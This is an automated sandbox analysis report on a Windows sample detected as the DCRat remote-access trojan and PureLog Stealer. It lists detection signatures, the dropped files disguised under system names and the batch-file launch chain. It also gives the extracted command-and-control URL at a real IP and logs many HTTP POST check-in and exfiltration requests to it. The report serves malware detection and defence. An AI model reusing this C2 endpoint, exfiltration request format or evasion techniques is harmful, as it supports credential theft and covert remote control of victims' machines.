
Windows Analysis Report
XNPOazHpXF.exe

Overview

General Information

Sample name: XNPOazHpXF.exe
renamed because original name is a hash value
Original sample name: ADAE028E0A5A72D219A02BB06D92241A.exe
Analysis ID: 1579268
MD5: adae028e0a5a72d219a02bb06d92241a
SHA1: 7cae683f773d541bd5c76ce6491ccb2f2f05c08a
SHA256: 3ac51e8fc3aa517aea4640efaffa1b04301c14dc876104e09ab9b7a3a95a0415
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to detect virtual machines (SGDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • XNPOazHpXF.exe (PID: 5688 cmdline: "C:\Users\user\Desktop\XNPOazHpXF.exe" MD5: ADAE028E0A5A72D219A02BB06D92241A)
    • cmd.exe (PID: 3628 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1kuSaYZZpb.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 4408 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 4280 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • services.exe (PID: 1352 cmdline: "C:\Windows\InputMethod\CHT\services.exe" MD5: ADAE028E0A5A72D219A02BB06D92241A)
  • cleanup
{"C2 url": "http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
XNPOazHpXF.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
XNPOazHpXF.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Source | Rule | Description | Author | Strings
C:\Recovery\dllhost.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Recovery\dllhost.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security

Source | Rule | Description | Author | Strings
00000007.00000002.3303823064.0000000003794000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000007.00000002.3303823064.00000000032FB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000007.00000002.3303823064.000000000391B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000000.00000000.2052319303.0000000000FB2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000000.00000002.2117348326.0000000013BDF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security

Source | Rule | Description | Author | Strings
0.0.XNPOazHpXF.exe.fb0000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
0.0.XNPOazHpXF.exe.fb0000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\XNPOazHpXF.exe, ProcessId: 5688, TargetFilename: C:\Recovery\dllhost.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: "C:\Windows\InputMethod\CHT\services.exe" , CommandLine: "C:\Windows\InputMethod\CHT\services.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\InputMethod\CHT\services.exe, NewProcessName: C:\Windows\InputMethod\CHT\services.exe, OriginalFileName: C:\Windows\InputMethod\CHT\services.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1kuSaYZZpb.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3628, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\InputMethod\CHT\services.exe" , ProcessId: 1352, ProcessName: services.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-21T10:47:25.908690+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49714 | 89.23.96.180 | 80 | TCP
2024-12-21T10:47:46.710148+0100 | 2048130 | 1 | A Network Trojan was detected | 192.168.2.5 | 49778 | 89.23.96.180 | 80 | TCP

AV Detection

Source: XNPOazHpXF.exe | Avira: detected
Source: C:\Users\user\Desktop\MpvkKZGd.log | Avira: detection malicious, Label: TR/Agent.jbwuj
Source: C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Recovery\dllhost.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Users\user\Desktop\BwIEkNWR.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\QKKBSDQi.log | Avira: detection malicious, Label: HEUR/AGEN.1362695
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Users\user\Desktop\KnJCpqCi.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\SVgCSVvi.log | Avira: detection malicious, Label: TR/AD.BitpyRansom.lcksd
Source: C:\Users\user\Desktop\BKAMFwmA.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\AppData\Local\Temp\1kuSaYZZpb.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\MYoSwDMa.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Recovery\conhost.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: 00000000.00000002.2117348326.0000000013BDF000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"C2 url": "http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe | ReversingLabs: Detection: 73%
Source: C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe | ReversingLabs: Detection: 73%
Source: C:\Recovery\conhost.exe | ReversingLabs: Detection: 73%
Source: C:\Recovery\dllhost.exe | ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\BwIEkNWR.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\DujMFNlM.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\FsHliKMo.log | ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\IzFuDcGk.log | ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\JedTEJPv.log | ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\LozUEcuw.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\MYoSwDMa.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\McDcppqu.log | ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\MpvkKZGd.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\QOfJDANU.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\RdNjnWVR.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\SVgCSVvi.log | ReversingLabs: Detection: 33%
Source: C:\Users\user\Desktop\TuCjUNij.log | ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\UbnsZBxQ.log | ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\YwCJgfGU.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\cEzSCxAQ.log | ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\hnCGlIml.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\hrRQfuPE.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\iSjOnjPm.log | ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\lQBpXVWv.log | ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\naXqXoBw.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\olqGOXgZ.log | ReversingLabs: Detection: 33%
Source: C:\Users\user\Desktop\qWWWVlrS.log | ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\qeFoAUSY.log | ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\uMMNchrL.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\yGSOdQVY.log | ReversingLabs: Detection: 29%
Source: C:\Windows\InputMethod\CHT\services.exe | ReversingLabs: Detection: 73%
Source: XNPOazHpXF.exe | ReversingLabs: Detection: 73%
Source: XNPOazHpXF.exe | Virustotal: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe | Joe Sandbox ML: detected
Source: C:\Recovery\dllhost.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\QKKBSDQi.log | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\FsHliKMo.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\McDcppqu.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\KnJCpqCi.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\QgmbSWHW.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\BKAMFwmA.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\EvgdMKxt.log | Joe Sandbox ML: detected
Source: C:\Recovery\conhost.exe | Joe Sandbox ML: detected
Source: XNPOazHpXF.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.2117348326.0000000013BDF000.00000004.00000800.00020000.00000000.sdmp | String decryptor: [["http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/","ImagepythonRequestLowGeocpuwpTemporary"]]
Source: XNPOazHpXF.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: XNPOazHpXF.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\XNPOazHpXF.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\XNPOazHpXF.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\XNPOazHpXF.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\XNPOazHpXF.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\XNPOazHpXF.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\XNPOazHpXF.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\XNPOazHpXF.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh | 0_2_00007FF8490CB81D
Source: C:\Windows\InputMethod\CHT\services.exe | Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh | 7_2_00007FF8490EB81D

Networking

Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49714 -> 89.23.96.180:80
Source: Network traffic | Suricata IDS: 2048130 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) : 192.168.2.5:49778 -> 89.23.96.180:80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: Joe Sandbox View | ASN Name: MAXITEL-ASRU MAXITEL-ASRU
Source: global traffic | HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 89.23.96.180 | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----zeihSAIObDfjW2EHuTgVjvpXZJn4D45Jgo | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 89.23.96.180 | Content-Length: 124358 | Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2112Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
                              Source: global traffic HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 89.23.96.180 Content-Length: 2084 Expect: 100-continue Connection: Keep-Alive
                              Source: global traffic HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 89.23.96.180 Content-Length: 2100 Expect: 100-continue Connection: Keep-Alive
                              Source: global traffic HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 89.23.96.180 Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
                              Source: unknown TCP traffic detected without corresponding DNS query: 89.23.96.180
                              Source: unknown HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 89.23.96.180 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                              Source: services.exe, 00000007.00000002.3303823064.000000000391B000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3303823064.000000000358C000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3303823064.00000000035C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://89.23.96.180
                              Source: services.exe, 00000007.00000002.3303823064.00000000032FB000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3303823064.000000000391B000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3303823064.000000000358C000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3303823064.00000000035C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlon
                              Source: XNPOazHpXF.exe, 00000000.00000002.2113796055.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, XNPOazHpXF.exe, 00000000.00000002.2113796055.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3303823064.00000000032FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: services.exe, 00000007.00000002.3323064532.0000000014335000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000013A1D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014A24000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000142DD000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014371000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000132EE000.00000004.00000800.00020000.00000000.sdmp, fC7n25oOth.7.dr, HslgI8GFKy.7.dr, 7lGrZZTg6P.7.dr, YKVdl3qRW3.7.dr, qrCXgKFeXX.7.dr, Me1sywPqWl.7.dr, zYDXjqUiwz.7.dr, 9pJalsOZnX.7.dr, C5HACCzIP7.7.dr, Aad1KyMxEJ.7.dr, FcHVbMX2xg.7.dr, q3ruztWTol.7.dr, pkOvVXzdYG.7.dr, iW5lf7oEU7.7.dr, dSWTN6jEWv.7.dr
                              String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              String found in binary or memory: https://duckduckgo.com/ac/?q=
                              String found in binary or memory: https://duckduckgo.com/chrome_newtab
                              String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              String found in binary or memory: https://www.ecosia.org/newtab/
                              String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: C:\Windows\InputMethod\CHT\services.exe Window created: window name: CLIPBRDWNDCLASS
                              Source: C:\Windows\InputMethod\CHT\services.exe Process Stats: CPU usage > 49%
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe File created: C:\Windows\InputMethod\CHT\services.exe
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe File created: C:\Windows\InputMethod\CHT\services.exe\:Zone.Identifier:$DATA
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe File created: C:\Windows\InputMethod\CHT\c5b4cb5e9653cc
                              Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe 3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
                              Source: Joe Sandbox View Dropped File: C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe 3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
                              Source: Joe Sandbox View Dropped File: C:\Recovery\conhost.exe 3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
                              Source: XNPOazHpXF.exe, 00000000.00000002.2112895255.00000000035E0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs XNPOazHpXF.exe
                              Source: XNPOazHpXF.exe, 00000000.00000002.2137909639.000000001C482000.00000002.00000001.01000000.00000000.sdmp Binary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs XNPOazHpXF.exe
                              Source: XNPOazHpXF.exe, 00000000.00000002.2113796055.0000000003C5A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs XNPOazHpXF.exe
                              Source: XNPOazHpXF.exe, 00000000.00000002.2138292682.000000001C55E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs XNPOazHpXF.exe
